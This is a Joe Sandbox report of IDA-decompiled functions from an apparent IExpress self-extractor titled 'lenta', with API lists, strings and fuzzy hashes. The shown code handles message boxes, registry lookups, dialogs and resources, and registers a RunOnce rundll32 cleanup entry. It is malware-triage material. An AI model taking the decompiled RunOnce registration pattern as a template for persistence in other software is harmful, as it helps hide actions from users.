                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				void* _t82;
                                                                      				intOrPtr* _t84;
                                                                      				void* _t85;
                                                                      				signed int _t89;
                                                                      
                                                                      				_t75 = __edx;
                                                                      				_t34 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t34 ^ _t89;
                                                                      				_v584 = __ecx;
                                                                      				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                      				_t67 = _a4;
                                                                      				_t69 = 0xd;
                                                                      				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                      				_t80 = _t83 + _t69 + _t69;
                                                                      				_v580 = _t37;
                                                                      				asm("movsb");
                                                                      				if(( *0x11d8a38 & 0x00000001) != 0) {
                                                                      					_t39 = 1;
                                                                      				} else {
                                                                      					_v576 = 0;
                                                                      					LoadStringA( *0x11d9a3c, _t75,  &_v576, 0x200);
                                                                      					if(_v576 != 0) {
                                                                      						_t73 =  &_v576;
                                                                      						_t16 = _t73 + 1; // 0x1
                                                                      						_t75 = _t16;
                                                                      						do {
                                                                      							_t43 =  *_t73;
                                                                      							_t73 = _t73 + 1;
                                                                      						} while (_t43 != 0);
                                                                      						_t84 = _v580;
                                                                      						_t74 = _t73 - _t75;
                                                                      						if(_t84 == 0) {
                                                                      							if(_t67 == 0) {
                                                                      								_t27 = _t74 + 1; // 0x2
                                                                      								_t83 = _t27;
                                                                      								_t44 = LocalAlloc(0x40, _t83);
                                                                      								_t80 = _t44;
                                                                      								if(_t80 == 0) {
                                                                      									goto L6;
                                                                      								} else {
                                                                      									_t75 = _t83;
                                                                      									_t74 = _t80;
                                                                      									E011D1680(_t80, _t83,  &_v576);
                                                                      									goto L23;
                                                                      								}
                                                                      							} else {
                                                                      								_t76 = _t67;
                                                                      								_t24 = _t76 + 1; // 0x1
                                                                      								_t85 = _t24;
                                                                      								do {
                                                                      									_t55 =  *_t76;
                                                                      									_t76 = _t76 + 1;
                                                                      								} while (_t55 != 0);
                                                                      								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                      								_t83 = _t25 + _t74;
                                                                      								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                      								_t80 = _t44;
                                                                      								if(_t80 == 0) {
                                                                      									goto L6;
                                                                      								} else {
                                                                      									E011D171E(_t80, _t83,  &_v576, _t67);
                                                                      									goto L23;
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							_t77 = _t67;
                                                                      							_t18 = _t77 + 1; // 0x1
                                                                      							_t81 = _t18;
                                                                      							do {
                                                                      								_t58 =  *_t77;
                                                                      								_t77 = _t77 + 1;
                                                                      							} while (_t58 != 0);
                                                                      							_t75 = _t77 - _t81;
                                                                      							_t82 = _t84 + 1;
                                                                      							do {
                                                                      								_t59 =  *_t84;
                                                                      								_t84 = _t84 + 1;
                                                                      							} while (_t59 != 0);
                                                                      							_t21 = _t74 + 0x64; // 0x65
                                                                      							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                      							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                      							_t80 = _t44;
                                                                      							if(_t80 == 0) {
                                                                      								goto L6;
                                                                      							} else {
                                                                      								_push(_v580);
                                                                      								E011D171E(_t80, _t83,  &_v576, _t67);
                                                                      								L23:
                                                                      								MessageBeep(_a12);
                                                                      								if(E011D681F(_t67) == 0) {
                                                                      									L25:
                                                                      									_t49 = 0x10000;
                                                                      								} else {
                                                                      									_t54 = E011D67C9(_t74, _t74);
                                                                      									_t49 = 0x190000;
                                                                      									if(_t54 == 0) {
                                                                      										goto L25;
                                                                      									}
                                                                      								}
                                                                      								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
                                                                      								_t83 = _t52;
                                                                      								LocalFree(_t80);
                                                                      								_t39 = _t52;
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						if(E011D681F(_t67) == 0) {
                                                                      							L4:
                                                                      							_t64 = 0x10010;
                                                                      						} else {
                                                                      							_t66 = E011D67C9(0, 0);
                                                                      							_t64 = 0x190010;
                                                                      							if(_t66 == 0) {
                                                                      								goto L4;
                                                                      							}
                                                                      						}
                                                                      						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                      						L6:
                                                                      						_t39 = _t44 | 0xffffffff;
                                                                      					}
                                                                      				}
                                                                      				return E011D6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                      			}



































                                                                      0x011d44b9
                                                                      0x011d44c4
                                                                      0x011d44cb
                                                                      0x011d44d8
                                                                      0x011d44e4
                                                                      0x011d44eb
                                                                      0x011d44ee
                                                                      0x011d44ef
                                                                      0x011d44ef
                                                                      0x011d44f1
                                                                      0x011d44f7
                                                                      0x011d44f8
                                                                      0x011d467b
                                                                      0x011d44fe
                                                                      0x011d4509
                                                                      0x011d4518
                                                                      0x011d4525
                                                                      0x011d4562
                                                                      0x011d4568
                                                                      0x011d4568
                                                                      0x011d456b
                                                                      0x011d456b
                                                                      0x011d456d
                                                                      0x011d456e
                                                                      0x011d4572
                                                                      0x011d4578
                                                                      0x011d457c
                                                                      0x011d45cb
                                                                      0x011d4607
                                                                      0x011d4607
                                                                      0x011d460d
                                                                      0x011d4613
                                                                      0x011d4617
                                                                      0x00000000
                                                                      0x011d461d
                                                                      0x011d4623
                                                                      0x011d4626
                                                                      0x011d4628
                                                                      0x00000000
                                                                      0x011d4628
                                                                      0x011d45cd
                                                                      0x011d45cd
                                                                      0x011d45cf
                                                                      0x011d45cf
                                                                      0x011d45d2
                                                                      0x011d45d2
                                                                      0x011d45d4
                                                                      0x011d45d5
                                                                      0x011d45db
                                                                      0x011d45de
                                                                      0x011d45e3
                                                                      0x011d45e9
                                                                      0x011d45ed
                                                                      0x00000000
                                                                      0x011d45f3
                                                                      0x011d45fd
                                                                      0x00000000
                                                                      0x011d4602
                                                                      0x011d45ed
                                                                      0x011d457e
                                                                      0x011d457e
                                                                      0x011d4580
                                                                      0x011d4580
                                                                      0x011d4583
                                                                      0x011d4583
                                                                      0x011d4585
                                                                      0x011d4586
                                                                      0x011d458a
                                                                      0x011d458c
                                                                      0x011d458f
                                                                      0x011d458f
                                                                      0x011d4591
                                                                      0x011d4592
                                                                      0x011d459b
                                                                      0x011d459e
                                                                      0x011d45a3
                                                                      0x011d45a9
                                                                      0x011d45ad
                                                                      0x00000000
                                                                      0x011d45af
                                                                      0x011d45af
                                                                      0x011d45bf
                                                                      0x011d462d
                                                                      0x011d4630
                                                                      0x011d463d
                                                                      0x011d464e
                                                                      0x011d464e
                                                                      0x011d463f
                                                                      0x011d4640
                                                                      0x011d4647
                                                                      0x011d464c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d464c
                                                                      0x011d4666
                                                                      0x011d466d
                                                                      0x011d466f
                                                                      0x011d4675
                                                                      0x011d4675
                                                                      0x011d45ad
                                                                      0x011d4527
                                                                      0x011d452e
                                                                      0x011d453f
                                                                      0x011d453f
                                                                      0x011d4530
                                                                      0x011d4531
                                                                      0x011d4538
                                                                      0x011d453d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d453d
                                                                      0x011d4554
                                                                      0x011d455a
                                                                      0x011d455a
                                                                      0x011d455a
                                                                      0x011d4525
                                                                      0x011d468c

                                                                      APIs
                                                                      • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 011D4518
                                                                      • MessageBoxA.USER32(?,?,lenta,00010010), ref: 011D4554
                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 011D45A3
                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 011D45E3
                                                                      • LocalAlloc.KERNEL32(00000040,00000002), ref: 011D460D
                                                                      • MessageBeep.USER32(00000000), ref: 011D4630
                                                                      • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 011D4666
                                                                      • LocalFree.KERNEL32(00000000), ref: 011D466F
                                                                        • Part of subcall function 011D681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 011D686E
                                                                        • Part of subcall function 011D681F: GetSystemMetrics.USER32(0000004A), ref: 011D68A7
                                                                        • Part of subcall function 011D681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 011D68CC
                                                                        • Part of subcall function 011D681F: RegQueryValueExA.ADVAPI32(?,011D1140,00000000,?,?,0000000C), ref: 011D68F4
                                                                        • Part of subcall function 011D681F: RegCloseKey.ADVAPI32(?), ref: 011D6902
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                      • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                      • API String ID: 3244514340-1000497449
                                                                      • Opcode ID: 769a05f93468d6101d132e22bcd289ccbe98b1bffdc94a09a93803cbcd52d892
                                                                      • Instruction ID: ebe786f9558e36264c5eb604c62ea120a78867c1f252437657de4875ddbcca23
                                                                      • Opcode Fuzzy Hash: 769a05f93468d6101d132e22bcd289ccbe98b1bffdc94a09a93803cbcd52d892
                                                                      • Instruction Fuzzy Hash: 8F51577290121AAFDF29DF28DC48BAA7B79EF44304F0401A4ED19A3A45DB31DE45CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E011D2773(CHAR* __ecx, char* _a4) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				char _v269;
                                                                      				CHAR* _v276;
                                                                      				int _v280;
                                                                      				void* _v284;
                                                                      				int _v288;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t23;
                                                                      				intOrPtr _t34;
                                                                      				int _t45;
                                                                      				int* _t50;
                                                                      				CHAR* _t52;
                                                                      				CHAR* _t61;
                                                                      				char* _t62;
                                                                      				int _t63;
                                                                      				CHAR* _t64;
                                                                      				signed int _t65;
                                                                      
                                                                      				_t52 = __ecx;
                                                                      				_t23 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t23 ^ _t65;
                                                                      				_t62 = _a4;
                                                                      				_t50 = 0;
                                                                      				_t61 = __ecx;
                                                                      				_v276 = _t62;
                                                                      				 *((char*)(__ecx)) = 0;
                                                                      				if( *_t62 != 0x23) {
                                                                      					_t63 = 0x104;
                                                                      					goto L14;
                                                                      				} else {
                                                                      					_t64 = _t62 + 1;
                                                                      					_v269 = CharUpperA( *_t64);
                                                                      					_v276 = CharNextA(CharNextA(_t64));
                                                                      					_t63 = 0x104;
                                                                      					_t34 = _v269;
                                                                      					if(_t34 == 0x53) {
                                                                      						L14:
                                                                      						GetSystemDirectoryA(_t61, _t63);
                                                                      						goto L15;
                                                                      					} else {
                                                                      						if(_t34 == 0x57) {
                                                                      							GetWindowsDirectoryA(_t61, 0x104);
                                                                      							goto L16;
                                                                      						} else {
                                                                      							_push(_t52);
                                                                      							_v288 = 0x104;
                                                                      							E011D1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                      							_t59 = 0x104;
                                                                      							E011D658A( &_v268, 0x104, _v276);
                                                                      							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                      								L16:
                                                                      								_t59 = _t63;
                                                                      								E011D658A(_t61, _t63, _v276);
                                                                      							} else {
                                                                      								if(RegQueryValueExA(_v284, 0x11d1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                      									_t45 = _v280;
                                                                      									if(_t45 != 2) {
                                                                      										L9:
                                                                      										if(_t45 == 1) {
                                                                      											goto L10;
                                                                      										}
                                                                      									} else {
                                                                      										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                      											_t45 = _v280;
                                                                      											goto L9;
                                                                      										} else {
                                                                      											_t59 = 0x104;
                                                                      											E011D1680(_t61, 0x104,  &_v268);
                                                                      											L10:
                                                                      											_t50 = 1;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								RegCloseKey(_v284);
                                                                      								L15:
                                                                      								if(_t50 == 0) {
                                                                      									goto L16;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return E011D6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                      			}























                                                                      0x011d2773
                                                                      0x011d277e
                                                                      0x011d2785
                                                                      0x011d278a
                                                                      0x011d278d
                                                                      0x011d2790
                                                                      0x011d2792
                                                                      0x011d2798
                                                                      0x011d279d
                                                                      0x011d28b2
                                                                      0x00000000
                                                                      0x011d27a3
                                                                      0x011d27a3
                                                                      0x011d27af
                                                                      0x011d27c2
                                                                      0x011d27c8
                                                                      0x011d27cd
                                                                      0x011d27d5
                                                                      0x011d28b7
                                                                      0x011d28b9
                                                                      0x00000000
                                                                      0x011d27db
                                                                      0x011d27dd
                                                                      0x011d28aa
                                                                      0x00000000
                                                                      0x011d27e3
                                                                      0x011d27e3
                                                                      0x011d27ec
                                                                      0x011d27f8
                                                                      0x011d2803
                                                                      0x011d280b
                                                                      0x011d2831
                                                                      0x011d28c3
                                                                      0x011d28c9
                                                                      0x011d28cd
                                                                      0x011d2837
                                                                      0x011d285a
                                                                      0x011d285c
                                                                      0x011d2865
                                                                      0x011d2892
                                                                      0x011d2895
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d2867
                                                                      0x011d2878
                                                                      0x011d288c
                                                                      0x00000000
                                                                      0x011d287a
                                                                      0x011d2880
                                                                      0x011d2885
                                                                      0x011d2897
                                                                      0x011d2899
                                                                      0x011d2899
                                                                      0x011d2878
                                                                      0x011d2865
                                                                      0x011d28a0
                                                                      0x011d28bf
                                                                      0x011d28c1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d28c1
                                                                      0x011d2831
                                                                      0x011d27dd
                                                                      0x011d27d5
                                                                      0x011d28e5

                                                                      APIs
                                                                      • CharUpperA.USER32(DC3102D5,00000000,00000000,00000000), ref: 011D27A8
                                                                      • CharNextA.USER32(0000054D), ref: 011D27B5
                                                                      • CharNextA.USER32(00000000), ref: 011D27BC
                                                                      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 011D2829
                                                                      • RegQueryValueExA.ADVAPI32(?,011D1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 011D2852
                                                                      • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 011D2870
                                                                      • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 011D28A0
                                                                      • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 011D28AA
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 011D28B9
                                                                      Strings
                                                                      • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 011D27E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                      • API String ID: 2659952014-2428544900
                                                                      • Opcode ID: d06ba28897f31b702abf63b4f0b44e084a5439aaf21c1c0f7ecbcca707013a7a
                                                                      • Instruction ID: 5d1b86cc408e30afe6daead0e088d2313e2b2a051f0ff1836d0f2449710481ff
                                                                      • Opcode Fuzzy Hash: d06ba28897f31b702abf63b4f0b44e084a5439aaf21c1c0f7ecbcca707013a7a
                                                                      • Instruction Fuzzy Hash: 94419371E01128AFDB2D9B64DC85AEABBBDEF55700F0040A9F659D3105DB748EC58FA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 62%
                                                                      			E011D2267() {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				char _v836;
                                                                      				void* _v840;
                                                                      				int _v844;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t19;
                                                                      				intOrPtr _t33;
                                                                      				void* _t38;
                                                                      				intOrPtr* _t42;
                                                                      				void* _t45;
                                                                      				void* _t47;
                                                                      				void* _t49;
                                                                      				signed int _t51;
                                                                      
                                                                      				_t19 =  *0x11d8004; // 0xdc3102d5
                                                                      				_t20 = _t19 ^ _t51;
                                                                      				_v8 = _t19 ^ _t51;
                                                                      				if( *0x11d8530 != 0) {
                                                                      					_push(_t49);
                                                                      					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                      						_push(_t38);
                                                                      						_v844 = 0x238;
                                                                      						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                      							_push(_t47);
                                                                      							memset( &_v268, 0, 0x104);
                                                                      							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                      								E011D658A( &_v268, 0x104, 0x11d1140);
                                                                      							}
                                                                      							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                      							E011D171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                      							_t42 =  &_v836;
                                                                      							_t45 = _t42 + 1;
                                                                      							_pop(_t47);
                                                                      							do {
                                                                      								_t33 =  *_t42;
                                                                      								_t42 = _t42 + 1;
                                                                      							} while (_t33 != 0);
                                                                      							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                      						}
                                                                      						_t20 = RegCloseKey(_v840);
                                                                      						_pop(_t38);
                                                                      					}
                                                                      					_pop(_t49);
                                                                      				}
                                                                      				return E011D6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                      			}



















                                                                      0x011d2272
                                                                      0x011d2277
                                                                      0x011d2279
                                                                      0x011d2283
                                                                      0x011d2289
                                                                      0x011d22ab
                                                                      0x011d22b1
                                                                      0x011d22c4
                                                                      0x011d22e0
                                                                      0x011d22e6
                                                                      0x011d22f5
                                                                      0x011d230d
                                                                      0x011d231c
                                                                      0x011d231c
                                                                      0x011d2321
                                                                      0x011d233a
                                                                      0x011d2342
                                                                      0x011d2348
                                                                      0x011d234b
                                                                      0x011d234c
                                                                      0x011d234c
                                                                      0x011d234e
                                                                      0x011d234f
                                                                      0x011d236e
                                                                      0x011d236e
                                                                      0x011d237a
                                                                      0x011d2380
                                                                      0x011d2380
                                                                      0x011d2381
                                                                      0x011d2381
                                                                      0x011d238f

                                                                      APIs
                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 011D22A3
                                                                      • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 011D22D8
                                                                      • memset.MSVCRT ref: 011D22F5
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 011D2305
                                                                      • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 011D236E
                                                                      • RegCloseKey.ADVAPI32(?), ref: 011D237A
                                                                      Strings
                                                                      • wextract_cleanup0, xrefs: 011D227C, 011D22CD, 011D2363
                                                                      • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 011D2299
                                                                      • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 011D232D
                                                                      • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 011D2321
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                      • API String ID: 3027380567-2554356261
                                                                      • Opcode ID: 518d02c7c4157a97307da7b24f0f4ea7f919334f2bd896dd00f9c4e45f5fbd55
                                                                      • Instruction ID: 82d6b88e47cc8551de002df5cf4e2df8cef5eab07d9accb6ca51b959032a4a9b
                                                                      • Opcode Fuzzy Hash: 518d02c7c4157a97307da7b24f0f4ea7f919334f2bd896dd00f9c4e45f5fbd55
                                                                      • Instruction Fuzzy Hash: 38319571A012287BDB39DB65DC89FEBBB7CEF54644F0001A9F50DA6001EB71AB84CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 87%
                                                                      			E011D3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				void* _t8;
                                                                      				void* _t11;
                                                                      				void* _t15;
                                                                      				struct HWND__* _t16;
                                                                      				struct HWND__* _t33;
                                                                      				struct HWND__* _t34;
                                                                      
                                                                      				_t8 = _a8 - 0xf;
                                                                      				if(_t8 == 0) {
                                                                      					if( *0x11d8590 == 0) {
                                                                      						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                      						 *0x11d8590 = 1;
                                                                      					}
                                                                      					L13:
                                                                      					return 0;
                                                                      				}
                                                                      				_t11 = _t8 - 1;
                                                                      				if(_t11 == 0) {
                                                                      					L7:
                                                                      					_push(0);
                                                                      					L8:
                                                                      					EndDialog(_a4, ??);
                                                                      					L9:
                                                                      					return 1;
                                                                      				}
                                                                      				_t15 = _t11 - 0x100;
                                                                      				if(_t15 == 0) {
                                                                      					_t16 = GetDesktopWindow();
                                                                      					_t33 = _a4;
                                                                      					E011D43D0(_t33, _t16);
                                                                      					SetDlgItemTextA(_t33, 0x834,  *0x11d8d4c);
                                                                      					SetWindowTextA(_t33, "lenta");
                                                                      					SetForegroundWindow(_t33);
                                                                      					_t34 = GetDlgItem(_t33, 0x834);
                                                                      					 *0x11d88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                      					SetWindowLongA(_t34, 0xfffffffc, E011D30C0);
                                                                      					return 1;
                                                                      				}
                                                                      				if(_t15 != 1) {
                                                                      					goto L13;
                                                                      				}
                                                                      				if(_a12 != 6) {
                                                                      					if(_a12 != 7) {
                                                                      						goto L9;
                                                                      					}
                                                                      					goto L7;
                                                                      				}
                                                                      				_push(1);
                                                                      				goto L8;
                                                                      			}









                                                                      0x011d3108
                                                                      0x011d310b
                                                                      0x011d31b7
                                                                      0x011d31ca
                                                                      0x011d31d0
                                                                      0x011d31d0
                                                                      0x011d31da
                                                                      0x00000000
                                                                      0x011d31da
                                                                      0x011d3111
                                                                      0x011d3114
                                                                      0x011d3136
                                                                      0x011d3136
                                                                      0x011d3138
                                                                      0x011d313b
                                                                      0x011d3141
                                                                      0x00000000
                                                                      0x011d3143
                                                                      0x011d3116
                                                                      0x011d311b
                                                                      0x011d314b
                                                                      0x011d3151
                                                                      0x011d3158
                                                                      0x011d316a
                                                                      0x011d3176
                                                                      0x011d317d
                                                                      0x011d318b
                                                                      0x011d319e
                                                                      0x011d31a3
                                                                      0x00000000
                                                                      0x011d31ad
                                                                      0x011d3120
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d312a
                                                                      0x011d3134
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3134
                                                                      0x011d312c
                                                                      0x00000000

                                                                      APIs
                                                                      • EndDialog.USER32(?,00000000), ref: 011D313B
                                                                      • GetDesktopWindow.USER32 ref: 011D314B
                                                                      • SetDlgItemTextA.USER32(?,00000834), ref: 011D316A
                                                                      • SetWindowTextA.USER32(?,lenta), ref: 011D3176
                                                                      • SetForegroundWindow.USER32(?), ref: 011D317D
                                                                      • GetDlgItem.USER32(?,00000834), ref: 011D3185
                                                                      • GetWindowLongA.USER32(00000000,000000FC), ref: 011D3190
                                                                      • SetWindowLongA.USER32(00000000,000000FC,011D30C0), ref: 011D31A3
                                                                      • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 011D31CA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                      • String ID: lenta
                                                                      • API String ID: 3785188418-2780258678
                                                                      • Opcode ID: 1186452eca3b11ee4d1da27e9cef743d155b4360e12394049569d7ff011a451d
                                                                      • Instruction ID: 791907b68eabcbc0a7d70daba0877484330fb72c08428e94a732aba9286cb297
                                                                      • Opcode Fuzzy Hash: 1186452eca3b11ee4d1da27e9cef743d155b4360e12394049569d7ff011a451d
                                                                      • Instruction Fuzzy Hash: 3111AF71257222BBDB2DAB3CBC0CB9A3A74FF4A760F000620F93592188DB709181C746
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E011D468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                      				long _t4;
                                                                      				void* _t11;
                                                                      				CHAR* _t14;
                                                                      				void* _t15;
                                                                      				long _t16;
                                                                      
                                                                      				_t14 = __ecx;
                                                                      				_t11 = __edx;
                                                                      				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                      				_t16 = _t4;
                                                                      				if(_t16 <= _a4 && _t11 != 0) {
                                                                      					if(_t16 == 0) {
                                                                      						L5:
                                                                      						return 0;
                                                                      					}
                                                                      					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                      					if(_t15 == 0) {
                                                                      						goto L5;
                                                                      					}
                                                                      					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                      					FreeResource(_t15);
                                                                      					return _t16;
                                                                      				}
                                                                      				return _t4;
                                                                      			}








                                                                      0x011d4699
                                                                      0x011d469b
                                                                      0x011d46a9
                                                                      0x011d46af
                                                                      0x011d46b4
                                                                      0x011d46bc
                                                                      0x011d46f9
                                                                      0x00000000
                                                                      0x011d46f9
                                                                      0x011d46d9
                                                                      0x011d46dd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d46e5
                                                                      0x011d46ef
                                                                      0x00000000
                                                                      0x011d46f5
                                                                      0x011d46ff

                                                                      APIs
                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46A0
                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46A9
                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46C3
                                                                      • LoadResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46CC
                                                                      • LockResource.KERNEL32(00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46D3
                                                                      • memcpy_s.MSVCRT ref: 011D46E5
                                                                      • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46EF
                                                                      Strings
                                                                      Memory Dump Source
